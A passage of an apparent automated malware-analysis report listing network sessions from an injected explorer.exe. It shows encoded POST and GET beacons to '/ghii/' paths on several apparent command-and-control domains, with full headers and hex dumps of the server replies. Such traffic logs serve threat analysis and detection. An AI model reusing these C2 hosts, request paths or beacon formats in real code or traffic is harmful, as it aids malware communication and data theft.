                                                    Data Ascii: 23.58v-33.13c0-12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5
                                                    Feb 20, 2023 11:24:30.862508059 CET150INData Raw: 39 20 32 2e 30 33 20 31 2e 33 32 20 33 2e 37 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31
                                                    Data Ascii: 9 2.03 1.32 3.75 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"
                                                    Feb 20, 2023 11:24:30.862557888 CET151INData Raw: 31 39 20 31 35 2e 32 37 20 33 2e 31 39 20 32 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36
                                                    Data Ascii: 19 15.27 3.19 23.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.0
                                                    Feb 20, 2023 11:24:30.862595081 CET152INData Raw: 75 73 73 69 61 6e 62 6c 75 72 20 63 6c 61 73 73 3d 22 62 6c 75 72 22 20 72 65 73 75 6c 74 3d 22 63 6f 6c 6f 72 65 64 42 6c 75 72 22 20 73 74 64 64 65 76 69 61 74 69 6f 6e 3d 22 34 22 3e 3c 2f 66 65 67 61 75 73 73 69 61 6e 62 6c 75 72 3e 0a 20 20
                                                    Data Ascii: ussianblur class="blur" result="coloredBlur" stddeviation="4"></fegaussianblur> <femerge> <femergenode in="coloredBlur"></femergenode> <femergenode in="SourceGraphic"></femergenode> </femerge> </filter> </defs


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.44970066.96.162.14980C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 20, 2023 11:24:36.078562021 CET153OUTPOST /ghii/ HTTP/1.1
                                                    Host: www.genuineinsights.cloud
                                                    Connection: close
                                                    Content-Length: 185
                                                    Cache-Control: no-cache
                                                    Origin: http://www.genuineinsights.cloud
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.genuineinsights.cloud/ghii/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 31 4c 4d 3d 57 5f 42 47 48 56 4b 79 39 42 52 73 41 79 6c 48 66 4a 73 2d 79 6e 77 4a 62 75 4d 36 37 39 6f 4a 76 7a 45 4b 48 6f 49 72 61 53 32 72 4b 2d 59 66 63 36 44 6d 69 44 4b 58 38 2d 4d 4d 74 68 33 4c 48 62 54 6f 65 6b 78 58 67 56 34 31 42 65 56 5a 6e 56 73 49 32 6c 37 68 46 33 57 49 61 77 32 32 6d 2d 31 32 6b 59 4d 2d 64 56 51 69 5a 63 33 6e 74 31 47 70 4b 4c 57 7a 56 35 6f 58 66 48 4c 59 64 70 31 61 74 42 7e 65 30 4c 28 6a 59 61 6c 34 5a 5f 4d 6d 30 32 72 73 53 75 4b 76 6b 38 41 6b 53 31 74 66 38 4a 6d 62 57 6a 48 4e 66 51 53 58 37 51 29 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: 1LM=W_BGHVKy9BRsAylHfJs-ynwJbuM679oJvzEKHoIraS2rK-Yfc6DmiDKX8-MMth3LHbToekxXgV41BeVZnVsI2l7hF3WIaw22m-12kYM-dVQiZc3nt1GpKLWzV5oXfHLYdp1atB~e0L(jYal4Z_Mm02rsSuKvk8AkS1tf8JmbWjHNfQSX7Q).
                                                    Feb 20, 2023 11:24:36.195274115 CET154INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Feb 2023 10:24:36 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 867
                                                    Connection: close
                                                    Server: Apache/2
                                                    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                    Accept-Ranges: bytes
                                                    Age: 0
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    4192.168.2.44970166.96.162.14980C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 20, 2023 11:24:38.713886023 CET155OUTGET /ghii/?1LM=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5RnkbE2XBG6Jig==&kTj=94JTJ5e-oG HTTP/1.1
                                                    Host: www.genuineinsights.cloud
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Feb 20, 2023 11:24:38.843964100 CET156INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Feb 2023 10:24:38 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 867
                                                    Connection: close
                                                    Server: Apache/2
                                                    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                    Accept-Ranges: bytes
                                                    Age: 0
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    5192.168.2.449702198.54.117.21280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 20, 2023 11:24:44.074593067 CET157OUTPOST /ghii/ HTTP/1.1
                                                    Host: www.octohoki.net
                                                    Connection: close
                                                    Content-Length: 185
                                                    Cache-Control: no-cache
                                                    Origin: http://www.octohoki.net
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.octohoki.net/ghii/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 31 4c 4d 3d 72 5a 6e 54 4d 5a 52 69 46 75 51 4c 79 4e 6d 72 33 42 34 79 59 54 51 58 45 59 56 35 79 37 45 37 47 5a 4a 4e 63 41 77 4c 59 62 6f 54 41 43 56 37 45 59 4e 4f 49 4c 6c 41 74 35 35 63 64 4f 64 59 31 7a 71 51 34 36 59 6f 4c 50 4e 42 4d 67 51 4f 44 30 59 78 55 35 6d 4c 37 49 6d 47 71 45 6b 70 35 46 35 38 47 67 45 76 58 75 64 2d 4b 5a 32 31 30 64 6a 6e 37 50 76 35 45 75 51 63 73 43 52 53 58 67 35 54 45 49 76 35 41 53 66 39 76 46 31 49 55 6a 4d 68 75 6b 53 6b 4d 43 5a 77 71 78 4a 6d 47 45 34 55 71 71 64 36 6d 4f 58 43 5a 52 6c 78 49 51 29 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: 1LM=rZnTMZRiFuQLyNmr3B4yYTQXEYV5y7E7GZJNcAwLYboTACV7EYNOILlAt55cdOdY1zqQ46YoLPNBMgQOD0YxU5mL7ImGqEkp5F58GgEvXud-KZ210djn7Pv5EuQcsCRSXg5TEIv5ASf9vF1IUjMhukSkMCZwqxJmGE4Uqqd6mOXCZRlxIQ).
                                                    Feb 20, 2023 11:24:44.245893955 CET158INHTTP/1.1 405 Not Allowed
                                                    Date: Mon, 20 Feb 2023 10:24:44 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 154
                                                    Connection: close
                                                    Server: namecheap-nginx
                                                    Allow: GET, HEAD
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    6192.168.2.449703198.54.117.21280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 20, 2023 11:24:46.771476984 CET158OUTGET /ghii/?1LM=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIleqyuhYHktxRXxg==&kTj=94JTJ5e-oG HTTP/1.1
                                                    Host: www.octohoki.net
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    7192.168.2.44970466.235.200.14680C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 20, 2023 11:24:52.217389107 CET160OUTPOST /ghii/ HTTP/1.1
                                                    Host: www.ladybillplanet.com
                                                    Connection: close
                                                    Content-Length: 185
                                                    Cache-Control: no-cache
                                                    Origin: http://www.ladybillplanet.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.ladybillplanet.com/ghii/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 31 4c 4d 3d 71 50 59 4d 58 4e 6c 66 51 6d 31 32 44 32 74 59 49 61 33 61 6c 5a 4a 68 39 35 7a 6e 4a 32 7a 38 77 4a 4b 71 28 43 61 34 78 69 69 47 70 78 59 39 76 4d 74 36 66 43 66 6f 69 73 6b 31 6d 72 38 36 43 2d 48 68 6e 70 47 5f 4c 45 36 34 66 56 30 56 37 58 72 39 4e 35 52 2d 62 39 61 6a 38 42 51 63 33 42 28 4e 73 37 33 7a 6e 4a 6b 4b 42 61 53 45 66 59 50 30 78 38 73 35 28 37 4f 63 59 46 52 73 6f 32 42 65 45 58 66 6a 79 65 31 32 72 34 49 4b 79 71 7e 76 5a 32 6d 63 50 73 56 7a 32 4d 46 34 56 73 4a 61 54 73 38 68 4c 71 38 71 45 34 7e 49 4a 67 29 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: 1LM=qPYMXNlfQm12D2tYIa3alZJh95znJ2z8wJKq(Ca4xiiGpxY9vMt6fCfoisk1mr86C-HhnpG_LE64fV0V7Xr9N5R-b9aj8BQc3B(Ns73znJkKBaSEfYP0x8s5(7OcYFRso2BeEXfjye12r4IKyq~vZ2mcPsVz2MF4VsJaTs8hLq8qE4~IJg).
                                                    Feb 20, 2023 11:24:52.751462936 CET161INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Feb 2023 10:24:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-UA-Compatible: IE=edge
                                                    Link: <https://ladybillplanet.com/wp-json/>; rel="https://api.w.org/"
                                                    Vary: Accept-Encoding
                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                    X-Endurance-Cache-Level: 2
                                                    X-nginx-cache: WordPress
                                                    CF-Cache-Status: DYNAMIC
                                                    Server: cloudflare
                                                    CF-RAY: 79c688f65ee62c22-FRA
                                                    Content-Encoding: gzip
                                                    Data Raw: 32 33 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d db 8e dc 46 96 e0 b3 ea 2b 42 14 4a 95 69 93 4c de 93 99 59 59 6e 5b 96 dd 5e cb 97 b5 e4 35 ba 65 41 88 24 23 33 a9 62 92 34 23 b2 b2 ca e5 02 fa a1 1f 06 8b 05 e6 61 dc c0 62 d7 33 98 79 58 60 5f 16 e8 dd e9 dd e9 87 de fd 20 cb fd 0f 8b 13 11 64 92 99 cc 4b 55 49 c6 60 ac 12 54 45 46 9c 5b 9c 38 71 e2 c4 95 c7 77 df ff ec c1 93 df 7c fe 10 4d d9 2c 3e 39 38 86 3f 28 c6 c9 64 a8 9c a6 da c7 5f 28 90 46 70 78 72 70 e7 78 46 18 46 c1 14 e7 94 b0 a1 f2 e5 93 0f 34 5f 29 d3 13 3c 23 c3 a3 3c 1d a5 8c 1e a1 20 4d 18 49 d8 f0 28 49 a3 24 24 e7 2a 1a a7 71 9c 2e 8e 50 e7 e4 a0 82 a0 9c 45 64 91 a5 39 53 4a 14 65 11 85 6c 3a 0c c9 59 14 10 8d bf a8 28 4a 22 16 e1 58 a3 01 8e c9 d0 e4 6c ef 6a 1a 7a 32 8d 28 a2 11 23 28 a2 28 cd 58 34 8b be 25 21 5a 44 6c 8a d8 94 a0 df a4 98 32 f4 f8 e1 67 28 8b e7 93 28 41 67 96 a1 9b 48 43 53 c6 32 da ef 74 2e 00 40 0f d2 59 67 91 e6 61 96 13 4a 3b 02 94 76 28 49 3b 48 d3 80 17 8b 58 4c 4e 3e c7 13 82 92 94 a1 71 3a 4f 42 a4 a1 1f ff d7 ff fd e9 1f 7f 40 3f fe cf 3f fd f8 c7 3f a0 97 7f fb fb 9f fe eb ef 7e fa fb 3f 1d 77 04 7c a1 9b 2c 4f 33 92 b3 8b a1 92 4e fa 71 0a 65 a8 94 f7 34 7d fe f1 17 0a 28 a6 09 9c 53 aa 40 ef 2b c3 46 82 a0 ad e7 a0 fc 0a d1 ed 34 68 90 47 19 43 ec 22 23 43 05 67 59 1c 05 98 45 69 d2 89 c3 b7 5f d0 34 51 50 10 63 4a 87 0a 57 a6 46 83 29 99 61 6d 92 e3 6c aa 9c 5c 2a bf e2 6c ce 99 d2 57 0a ad 0b 10 3d cd 27 8a aa fc 4a 40 f6 9f 5e 2a bf 02 1e 4a 5f f9 8a 8c 1e 47 8c 40 66 14 56 f0 62 1c 5e 8c a2 38 ce 62 9c 10 51 6d f7 16 64 44 05 ec 3c 8f b7 c3 2a aa c2 0b de df 58 60 55 09 89 28 6e 94 26 00 f7 97 ff 81 fe fa 87 df ff f4 5f be ff eb 1f 7e 28 54 fd f2 8f 7f 5b 60 fe f4 8f 7f 78 f9 cf 7f 7a f9 df fe 82 7e fa e3 ff fb e9 ef 7f ff d3 df fc 67 f4 d3 3f fc cd cb ff f8 3d 7a f9 e7 ef 5f fe d3 0f 3f fe cb 9f 15 55 c9 52 d0 73 84 e3 77 03 41 b8 52 d6 c7 04 e7 c1 54 66 a8 0a c3 f9 84 30 a5 bf 04 78 98 b0 fc e2 f3 34 4a 98 28 e3 13 32 cb 62 cc c8 f6 b2 be 43 87 97 94 93 7e ce 48 3e 7b 4e 59 1e 25 93 2b e5 4a 55 be 99 93 fc 42 8b 92 6c 0e 75 92 93 6f e6 51 4e 42 d1 20 d7 51 94 ab 67 aa 12 25 8f 70 32 99 e3 09 70 15 8e e1 ea d9 d5 71 47 e8
                                                    Data Ascii: 2390}F+BJiLYYn[^5eA$#3b4#ab3yX`_ dKUI`TEF[8qw|M,>98?(d_(FpxrpxFF4_)<#< MI(I$$*q.PEd9SJel:Y(J"Xljz2(#((X4%!ZDl2g((AgHCS2t.@YgaJ;v(I;HXLN>q:OB@???~?w|,O3Nqe4}(S@+F4hGC"#CgYEi_4QPcJWF)aml\*lW='J@^*J_G@fVb^8bQmdD<*X`U(n&_~(T[`xz~g?=z_?URswARTf0x4J(2bC~H>{NY%+JUBluoQNB Qg%p2pqG
                                                    Feb 20, 2023 11:24:52.751564980 CET162INData Raw: aa 68 8d 9d b5 f6 a6 f3 f6 73 70 70 1c 47 c9 29 ca 49 3c 3c 0a 13 aa 65 39 19 13 16 4c 8f d0 34 27 e3 e1 51 53 09 84 ab d8 85 b7 58 2c f4 49 9a 4e 62 c2 f0 64 86 13 3c 21 f9 fe d8 91 a1 2f b2 06 70 05 c7 8c e4 09 28 b9 c1 ec 73 4a df 3e 9f c5 0a
                                                    Data Ascii: hsppG)I<<e9L4'QSX,INbd<!/p(sJ>mscAs<~"n1!aGyODA:hE/$LEFf1a,J&2|Yi_wP}-N4BiNp;ukwg8z6=z6 H8tY&fM
                                                    Feb 20, 2023 11:24:52.751612902 CET164INData Raw: e3 8b cb 65 52 5f 26 0d 2a 65 df 52 74 2e 08 11 7d fb f5 8b fd 82 76 aa 04 6a 2f 60 75 24 d7 62 32 c1 c1 45 4d 07 8e 6e e9 66 77 5d 09 5b 2b e8 d5 0a ba 42 70 9f 2a da 2c 1d 1f eb 47 81 c6 a6 64 46 34 91 7b 33 13 aa 51 a2 35 a9 b6 1a cd 24 4e 47
                                                    Data Ascii: eR_&*eRt.}vj/`u$b2EMnfw][+Bp*,GdF4{3Q5$NG0$X,f4Q4-H4Q>gA#Lpm#:>G#?>7?0Eww(r`l4Ys*=m*(INHG0Fh
                                                    Feb 20, 2023 11:24:52.751674891 CET165INData Raw: 70 1b 26 7b fb 87 db 30 d9 ed 35 6e 43 7d 3f 5f 72 1b 0e d7 f7 30 b7 e1 76 2b bf f3 0a 19 ef ed 8d 6e c5 f3 06 3e ea f6 55 79 1d cf 75 6b d3 bc 8e 3f bb 7d d1 f6 f6 72 b7 67 b5 cb f7 f1 f5 df 82 78 e5 e5 95 f8 bc 1b 10 df df d7 dd 80 f8 1e 3e ee
                                                    Data Ascii: p&{05nC}?_r0v+n>Uyuk?}rgx>Tm7|v.egW|MMZEGFcm9t!|^Vn%>mn'u8KrRM6{vv~Sw+9)6KobNn#b+HmAXr{56yv+6K2
                                                    Feb 20, 2023 11:24:52.751737118 CET166INData Raw: 5e 64 b0 de 90 c1 8b 7b d3 4a d9 54 e6 cd a2 ed 19 65 a9 7b c2 c9 21 c7 e6 ae 7d 15 5e 8e 55 76 d7 ac 08 04 b8 be 05 8f bd ea 86 a2 0d 98 1b b4 71 ed 66 ca fd 02 c9 30 0f f9 cb 01 12 45 7a 94 40 38 a2 61 88 44 79 3b 6c 84 2a ee f6 d0 70 4e f0 26
                                                    Data Ascii: ^d{JTe{!}^Uvqf0Ez@8aDy;l*pN&O"6@A>nmgTW!7)~-@2Cp]~=JN$2Q"S2L)\t\6:Ud!3s|BuC3jg5^/lnnH_!s+)!P*
                                                    Feb 20, 2023 11:24:52.751791000 CET168INData Raw: d6 4b 76 bb f7 19 55 90 75 8e bc 72 99 bb 1c dc a5 79 e5 6a f1 af d2 3c fc 1c 9c 0f 12 f7 e1 ee 83 53 56 cb e8 a2 a8 44 53 ef 39 ba c1 55 5b 41 4e f0 19 c9 45 20 72 46 f2 68 2c 4b 59 21 e5 76 0d cf b7 ed d0 eb 8d c7 8e db f5 c3 91 81 43 7f 34 26
                                                    Data Ascii: KvUuryj<SVDS9U[ANE rFh,KY!vC4&q[x]JqCoa>OGW{7Iq:lroe]-SscP~!DlfU)D)#=eQ\*4Ai~z`
                                                    Feb 20, 2023 11:24:52.751837969 CET169INData Raw: 21 f1 27 e8 e9 76 d7 d6 e0 b7 85 2c 47 77 bd 9e 7c b1 6d bd e7 58 c8 78 64 b9 1e b2 2c 4b 37 dc 5e 6c ba 1c 4b e3 7f ed dd c8 48 bc 72 38 54 85 43 86 84 79 64 f9 3d 1d fa 60 cb f5 04 79 1b 49 2e c1 4e 64 ad 92 a7 c9 3c f1 52 97 5e b0 88 35 49 18
